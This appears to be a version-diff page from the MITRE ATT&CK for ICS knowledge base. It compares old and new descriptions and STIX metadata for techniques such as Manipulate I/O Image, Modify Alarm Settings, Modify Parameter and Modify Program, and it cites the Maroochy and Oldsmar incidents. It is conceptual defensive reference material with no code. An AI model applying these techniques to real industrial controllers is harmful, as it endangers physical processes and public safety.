t1Adversaries may seek to capture process image values relatedt1Adversaries may seek to capture process values related to th
> to the inputs and outputs of a PLC. Within a PLC all input >e inputs and outputs of a PLC. During the scan cycle, a PLC 
>and output states are stored into an I/O image. This image i>reads the status of all inputs and stores them in an image t
>s used by the user program instead of directly interacting w>able. (Citation: Nanjundaiah, Vaidyanath) The image table is
>ith physical I/O. (Citation: PLC-Blaster 2) Adversaries may > the PLCs internal storage location where values of inputs/o
>collect the I/O Image state of a PLC by utilizing a device’s>utputs for one scan are stored while it executes the user pr
> Native API to access the memory regions directly. The colle>ogram. After the PLC has solved the entire logic program, it
>ction of the PLC’s I/O state could be used to replace values> updates the output image table. The contents of this output
> or inform future stages of an attack.> image table are written to the corresponding output points 
 >in I/O Modules.  The Input and Output Image tables described
 > above make up the I/O Image on a PLC. This image is used by
 > the user program instead of directly interacting with physi
 >cal I/O. (Citation: Spenneberg, Ralf 2016)   Adversaries may
 > collect the I/O Image state of a PLC by utilizing a devices
 > [Native API](https://attack.mitre.org/techniques/T0834) to 
 >access the memory regions directly. The collection of the PL
 >Cs I/O state could be used to replace values or inform futur
 >e stages of an attack.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 15:25:32.143000+00:002022-09-27 18:41:43.724000+00:00
descriptionAdversaries may seek to capture process image values related to the inputs and outputs of a PLC. Within a PLC all input and output states are stored into an I/O image. This image is used by the user program instead of directly interacting with physical I/O. (Citation: PLC-Blaster 2) Adversaries may collect the I/O Image state of a PLC by utilizing a device’s Native API to access the memory regions directly. The collection of the PLC’s I/O state could be used to replace values or inform future stages of an attack.Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. The Input and Output Image tables described above make up the I/O Image on a PLC. This image is used by the user program instead of directly interacting with physical I/O. (Citation: Spenneberg, Ralf 2016) Adversaries may collect the I/O Image state of a PLC by utilizing a devices [Native API](https://attack.mitre.org/techniques/T0834) to access the memory regions directly. The collection of the PLCs I/O state could be used to replace values or inform future stages of an attack.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0877https://attack.mitre.org/techniques/T0877
external_references[1]['source_name']PLC-Blaster 2Nanjundaiah, Vaidyanath
external_references[1]['description']Spenneberg, Ralf. (2016). PLC-Blaster. Retrieved June 6, 2019.Nanjundaiah, Vaidyanath PLC Ladder Logic Basics Retrieved. 2021/10/11
external_references[1]['url']https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdfhttps://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm
external_references[2]['source_name']Stuxnet - Symantec - 201102Spenneberg, Ralf 2016
external_references[2]['description']Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06
external_references[2]['url']https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdfhttps://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf

[T0867] Lateral Tool Transfer

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may transfer tools or other files from one systet1Adversaries may transfer tools or other files from one syste
>m to another to stage adversary tools or other files over th>m to another to stage adversary tools or other files over th
>e course of an operation. (Citation: EAttack Lateral Tool Tr>e course of an operation. (Citation: Enterprise ATT&CK) Copy
>ansfer) Copying of files may also be performed laterally bet>ing of files may also be performed laterally between interna
>ween internal victim systems to support Lateral Movement wit>l victim systems to support Lateral Movement with remote Exe
>h remote Execution using inherent file sharing protocols suc>cution using inherent file sharing protocols such as file sh
>h as file sharing over SMB to connected network shares. (Cit>aring over SMB to connected network shares. (Citation: Enter
>ation: EAttack Remote File Copy)  In control systems environ>prise ATT&CK)  In control systems environments, malware may 
>ments, malware may use SMB and other file sharing protocols >use SMB and other file sharing protocols to move laterally t
>to move laterally through industrial networks.>hrough industrial networks.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 17:39:15.755000+00:00
descriptionAdversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: EAttack Lateral Tool Transfer) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: EAttack Remote File Copy) In control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK) In control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0867https://attack.mitre.org/techniques/T0867
external_references[1]['source_name']EAttack Lateral Tool TransferEnterprise ATT&CK
external_references[1]['description']Enterprise ATT&CK. (n.d.). Lateral Tool Transfer. Retrieved October 27, 2019.Enterprise ATT&CK Enterprise ATT&CK Lateral Tool Transfer Retrieved. 2019/10/27 Lateral Tool Transfer Retrieved. 2019/10/27

[T0835] Manipulate I/O Image

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may manipulate the I/O image of PLCs through vart1Adversaries may manipulate the I/O image of PLCs through var
>ious means to prevent them from functioning as expected. Met>ious means to prevent them from functioning as expected. Met
>hods of I/O image manipulation may include overriding the I/>hods of I/O image manipulation may include overriding the I/
>O table via direct memory manipulation or using the override>O table via direct memory manipulation or using the override
> function used for testing PLC programs. (Citation: Guidance> function used for testing PLC programs. (Citation: Dr. Kelv
> - ISA PLC)    During the scan cycle, a PLC reads the status>in T. Erickson December 2010) During the scan cycle, a PLC r
> of all inputs and stores them in an image table.2 The image>eads the status of all inputs and stores them in an image ta
> table is the PLC’s internal storage location where values o>ble. (Citation: Nanjundaiah, Vaidyanath) The image table is 
>f inputs/outputs for one scan are stored while it executes t>the PLCs internal storage location where values of inputs/ou
>he user program. After the PLC has solved the entire logic p>tputs for one scan are stored while it executes the user pro
>rogram, it updates the output image table. The contents of t>gram. After the PLC has solved the entire logic program, it 
>his output image table are written to the corresponding outp>updates the output image table. The contents of this output 
>ut points in I/O Modules.  One of the unique characteristics>image table are written to the corresponding output points i
> of PLCs is their ability to override the status of a physic>n I/O Modules.   One of the unique characteristics of PLCs i
>al discrete input or to override the logic driving a physica>s their ability to override the status of a physical discret
>l output coil and force the output to a desired status.>e input or to override the logic driving a physical output c
 >oil and force the output to a desired status.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 15:25:32.143000+00:002022-10-20 20:46:11.459000+00:00
descriptionAdversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Guidance - ISA PLC) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table.2 The image table is the PLC’s internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. One of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. One of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T835https://attack.mitre.org/techniques/T0835
external_references[1]['source_name']Guidance - ISA PLCDr. Kelvin T. Erickson December 2010
external_references[1]['description']Dr. Kelvin T. Erickson. (2010, December). Programmable logic controller hardware. Retrieved March 29, 2018.Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29
external_references[2]['source_name']PLC-Blaster 2Nanjundaiah, Vaidyanath
external_references[2]['description']Spenneberg, Ralf. (2016). PLC-Blaster. Retrieved June 6, 2019.Nanjundaiah, Vaidyanath Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 PLC Ladder Logic Basics Retrieved. 2021/10/11
external_references[2]['url']https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdfhttps://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Stuxnet - Symantec - 201102', 'description': 'Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.', 'url': 'https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf'}

[T0849] Masquerading

Current version: 1.1

Version changed from: 0.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 16:56:31.022000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0849https://attack.mitre.org/techniques/T0849

[T0838] Modify Alarm Settings

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may modify alarm settings to prevent alerts thatt1Adversaries may modify alarm settings to prevent alerts that
> may inform operators of their presence or to prevent respon> may inform operators of their presence or to prevent respon
>ses to dangerous and unintended scenarios. Reporting message>ses to dangerous and unintended scenarios. Reporting message
>s are a standard part of data acquisition in control systems>s are a standard part of data acquisition in control systems
>. Reporting messages are used as a way to transmit system st>. Reporting messages are used as a way to transmit system st
>ate information and acknowledgements that specific actions h>ate information and acknowledgements that specific actions h
>ave occurred. These messages provide vital information for t>ave occurred. These messages provide vital information for t
>he management of a physical process, and keep operators, eng>he management of a physical process, and keep operators, eng
>ineers, and administrators aware of the state of system devi>ineers, and administrators aware of the state of system devi
>ces and physical processes.  If an adversary is able to chan>ces and physical processes.   If an adversary is able to cha
>ge the reporting settings, certain events could be prevented>nge the reporting settings, certain events could be prevente
> from being reported. This type of modification can also pre>d from being reported. This type of modification can also pr
>vent operators or devices from performing actions to keep th>event operators or devices from performing actions to keep t
>e system in a safe state. If critical reporting messages can>he system in a safe state. If critical reporting messages ca
>not trigger these actions then a Impact could occur.  In ICS>nnot trigger these actions then a [Impact](http://attacksite
> environments, the adversary may have to use <span class="sm>.mitre.org/tactics/TA0105/) could occur.   In ICS environmen
>w-format list-format "><span class="smw-row"><span class="sm>ts, the adversary may have to use [Alarm Suppression](https:
>w-field"><span class="smw-value">Alarm Suppression</span></s>//attack.mitre.org/techniques/T0878) or contend with multipl
>pan></span></span> or contend with multiple alarms and/or al>e alarms and/or alarm propagation to achieve a specific goal
>arm propagation to achieve a specific goal to evade detectio> to evade detection or prevent intended responses from occur
>n or prevent intended responses from occurring.  (Citation: >ring. (Citation: Jos Wetzels, Marina Krotofil 2019)  Methods
>References - Secura - 2019) Methods of suppression often rel> of suppression often rely on modification of alarm settings
>y on modification of alarm settings, such as modifying in me>, such as modifying in memory code to fixed values or tamper
>mory code to fixed values or tampering with assembly level i>ing with assembly level instruction code.   In the Maroochy 
>nstruction code.    In the Maroochy Attack, the adversary di>Shire attack, the adversary disabled alarms at four pumping 
>sabled alarms at four pumping stations. This caused alarms t>stations. This caused alarms to not be reported to the centr
>o not be reported to the central computer. (Citation: Marooc>al computer.(Citation: Marshall Abrams July 2008)
>hy - MITRE - 200808) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-20 18:14:48.212000+00:00
descriptionAdversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a Impact could occur. In ICS environments, the adversary may have to use Alarm Suppression or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: References - Secura - 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. In the Maroochy Attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer. (Citation: Maroochy - MITRE - 200808)Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](http://attacksite.mitre.org/tactics/TA0105/) could occur. In ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. In the Maroochy Shire attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer.(Citation: Marshall Abrams July 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0838https://attack.mitre.org/techniques/T0838
external_references[1]['source_name']Maroochy - MITRE - 200808Jos Wetzels, Marina Krotofil 2019
external_references[1]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01
external_references[1]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf
external_references[2]['source_name']References - Secura - 2019Marshall Abrams July 2008
external_references[2]['description']Jos Wetzels, Marina Krotofil. (2019). A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices. Retrieved November 1, 2019.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[2]['url']https://troopers.de/downloads/troopers19/TROOPERS19%20NGI%20IoT%20diet%20poisoned%20fruit.pdfhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

[T0821] Modify Controller Tasking

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may modify the tasking of a controller to allow t1Adversaries may modify the tasking of a controller to allow 
>for the execution of their own programs. This can allow an a>for the execution of their own programs. This can allow an a
>dversary to manipulate the execution flow and behavior of a >dversary to manipulate the execution flow and behavior of a 
>controller. According to 61131-3, the association of a Task >controller.   According to 61131-3, the association of a Tas
>with a Program Organization Unit (POU) defines a task associ>k with a Program Organization Unit (POU) defines a task asso
>ation. An adversary may modify these associations or create >ciation. (Citation: IEC February 2013) An adversary may modi
>new ones to manipulate the execution flow of a controller. M>fy these associations or create new ones to manipulate the e
>odification of controller tasking can be accomplished using >xecution flow of a controller. Modification of controller ta
>a Program Download in addition to other types of program mod>sking can be accomplished using a Program Download in additi
>ification such as online edit and program append. Tasks have>on to other types of program modification such as online edi
> properties, such as interval, frequency and priority to mee>t and program append.  Tasks have properties, such as interv
>t the requirements of program execution. Some controller ven>al, frequency and priority to meet the requirements of progr
>dors implement tasks with implicit, pre-defined properties w>am execution. Some controller vendors implement tasks with i
>hereas others allow for these properties to be formulated ex>mplicit, pre-defined properties whereas others allow for the
>plicitly. An adversary may associate their program with task>se properties to be formulated explicitly. An adversary may 
>s that have a higher priority or execute associated programs>associate their program with tasks that have a higher priori
> more frequently. For instance, to ensure cyclic execution o>ty or execute associated programs more frequently. For insta
>f their program on a Siemens controller, an adversary may ad>nce, to ensure cyclic execution of their program on a Siemen
>d their program to the task, Organization Block 1 (OB1).>s controller, an adversary may add their program to the task
 >, Organization Block 1 (OB1).

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 15:49:27.003000+00:00
descriptionAdversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller. According to 61131-3, the association of a Task with a Program Organization Unit (POU) defines a task association. An adversary may modify these associations or create new ones to manipulate the execution flow of a controller. Modification of controller tasking can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. Tasks have properties, such as interval, frequency and priority to meet the requirements of program execution. Some controller vendors implement tasks with implicit, pre-defined properties whereas others allow for these properties to be formulated explicitly. An adversary may associate their program with tasks that have a higher priority or execute associated programs more frequently. For instance, to ensure cyclic execution of their program on a Siemens controller, an adversary may add their program to the “task”, Organization Block 1 (OB1).Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller. According to 61131-3, the association of a Task with a Program Organization Unit (POU) defines a task association. (Citation: IEC February 2013) An adversary may modify these associations or create new ones to manipulate the execution flow of a controller. Modification of controller tasking can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. Tasks have properties, such as interval, frequency and priority to meet the requirements of program execution. Some controller vendors implement tasks with implicit, pre-defined properties whereas others allow for these properties to be formulated explicitly. An adversary may associate their program with tasks that have a higher priority or execute associated programs more frequently. For instance, to ensure cyclic execution of their program on a Siemens controller, an adversary may add their program to the task, Organization Block 1 (OB1).
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0821https://attack.mitre.org/techniques/T0821
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'IEC February 2013', 'description': 'IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ', 'url': 'https://webstore.iec.ch/publication/4552'}

[T0836] Modify Parameter

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may modify parameters used to instruct industriat1Adversaries may modify parameters used to instruct industria
>l control system devices. These devices operate via programs>l control system devices. These devices operate via programs
> that dictate how and when to perform actions based on such > that dictate how and when to perform actions based on such 
>parameters. Such parameters can determine the extent to whic>parameters. Such parameters can determine the extent to whic
>h an action is performed and may specify additional options.>h an action is performed and may specify additional options.
> For example, a program on a control system device dictating> For example, a program on a control system device dictating
> motor processes may take a parameter defining the total num> motor processes may take a parameter defining the total num
>ber of seconds to run that motor.      An adversary can pote>ber of seconds to run that motor.        An adversary can po
>ntially modify these parameters to produce an outcome outsid>tentially modify these parameters to produce an outcome outs
>e of what was intended by the operators. By modifying system>ide of what was intended by the operators. By modifying syst
> and process critical parameters, the adversary may cause Im>em and process critical parameters, the adversary may cause 
>pact to equipment and/or control processes. Modified paramet>[Impact](https://attack.mitre.org/tactics/TA0105) to equipme
>ers may be turned into dangerous, out-of-bounds, or unexpect>nt and/or control processes. Modified parameters may be turn
>ed values from typical operations. For example, specifying t>ed into dangerous, out-of-bounds, or unexpected values from 
>hat a process run for more or less time than it should, or d>typical operations. For example, specifying that a process r
>ictating an unusually high, low, or invalid value as a param>un for more or less time than it should, or dictating an unu
>eter.   In the Maroochy Attack, Vitek Boden gained remote co>sually high, low, or invalid value as a parameter.  In the M
>mputer access to the control system and altered data so that>aroochy Shire attack, the adversary gained remote computer a
> whatever function should have occurred at affected pumping >ccess to the control system and altered data so that whateve
>stations did not occur or occurred in a different way. The s>r function should have occurred at affected pumping stations
>oftware program installed in the laptop was one developed by> did not occur or occurred in a different way. The software 
> Hunter Watertech for its use in changing configurations in >program installed in the laptop was one developed for changi
>the PDS computers. This ultimately led to 800,000 liters of >ng configurations in the PDS computers. This ultimately led 
>raw sewage being spilled out into the community. (Citation: >to 800,000 liters of raw sewage being spilled out into the c
>Maroochy - MITRE - 200808) In the Oldsmar water treatment at>ommunity.(Citation: Marshall Abrams July 2008)
>tack, adversaries raised the sodium hydroxide setpoint value 
> from 100 part-per-million (ppm) to 11,100 ppm, far beyond n 
>ormal operating levels. (Citation: Oldsmar Water Treatment A 
>ttack Feb 2021) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 15:25:32.143000+00:002022-10-20 18:13:48.146000+00:00
descriptionAdversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause Impact to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808) In the Oldsmar water treatment attack, adversaries raised the sodium hydroxide setpoint value from 100 part-per-million (ppm) to 11,100 ppm, far beyond normal operating levels. (Citation: Oldsmar Water Treatment Attack Feb 2021)Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Shire attack, the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed for changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.(Citation: Marshall Abrams July 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0836https://attack.mitre.org/techniques/T0836
external_references[1]['source_name']Maroochy - MITRE - 200808Marshall Abrams July 2008
external_references[1]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[1]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Oldsmar Water Treatment Attack Feb 2021', 'description': 'Pinellas County Sheriff’s Office. (2021, February 8). Treatment Plant Intrusion Press Conference. Retrieved October 8, 2021.', 'url': 'https://www.youtube.com/watch?v=MkXDSOgLQ6M'}

[T0889] Modify Program

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may modify or add a program on a controller to at1Adversaries may modify or add a program on a controller to a
>ffect how it interacts with the physical process, peripheral>ffect how it interacts with the physical process, peripheral
> devices and other hosts on the network. Modification to con> devices and other hosts on the network. Modification to con
>troller programs can be accomplished using a Program Downloa>troller programs can be accomplished using a Program Downloa
>d in addition to other types of program modification such as>d in addition to other types of program modification such as
> online edit and program append. Program modification encomp> online edit and program append.   Program modification enco
>asses the addition and modification of instructions and logi>mpasses the addition and modification of instructions and lo
>c contained in Program Organization Units (POU) and similar >gic contained in Program Organization Units (POU)  (Citation
>programming elements found on controllers. This can include,>: IEC February 2013) and similar programming elements found 
> for example, adding new functions to a controller, modifyin>on controllers. This can include, for example, adding new fu
>g the logic in existing functions and making new calls from >nctions to a controller, modifying the logic in existing fun
>one function to another. Some programs may allow an adversar>ctions and making new calls from one function to another.   
>y to interact directly with the native API of the controller>Some programs may allow an adversary to interact directly wi
> to take advantage of obscure features or vulnerabilities.>th the native API of the controller to take advantage of obs
 >cure features or vulnerabilities.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 16:08:15.574000+00:00
descriptionAdversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. Program modification encompasses the addition and modification of instructions and logic contained in Program Organization Units (POU) and similar programming elements found on controllers. This can include, for example, adding new functions to a controller, modifying the logic in existing functions and making new calls from one function to another. Some programs may allow an adversary to interact directly with the native API of the controller to take advantage of obscure features or vulnerabilities.Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. Program modification encompasses the addition and modification of instructions and logic contained in Program Organization Units (POU) (Citation: IEC February 2013) and similar programming elements found on controllers. This can include, for example, adding new functions to a controller, modifying the logic in existing functions and making new calls from one function to another. Some programs may allow an adversary to interact directly with the native API of the controller to take advantage of obscure features or vulnerabilities.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0889https://attack.mitre.org/techniques/T0889
external_references[1]['source_name']IEC Programmable controllers February 2013IEC February 2013
external_references[1]['description']IEC. (2013, February 20). IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages. Retrieved October 22, 2019.IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22

[T0839] Module Firmware

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
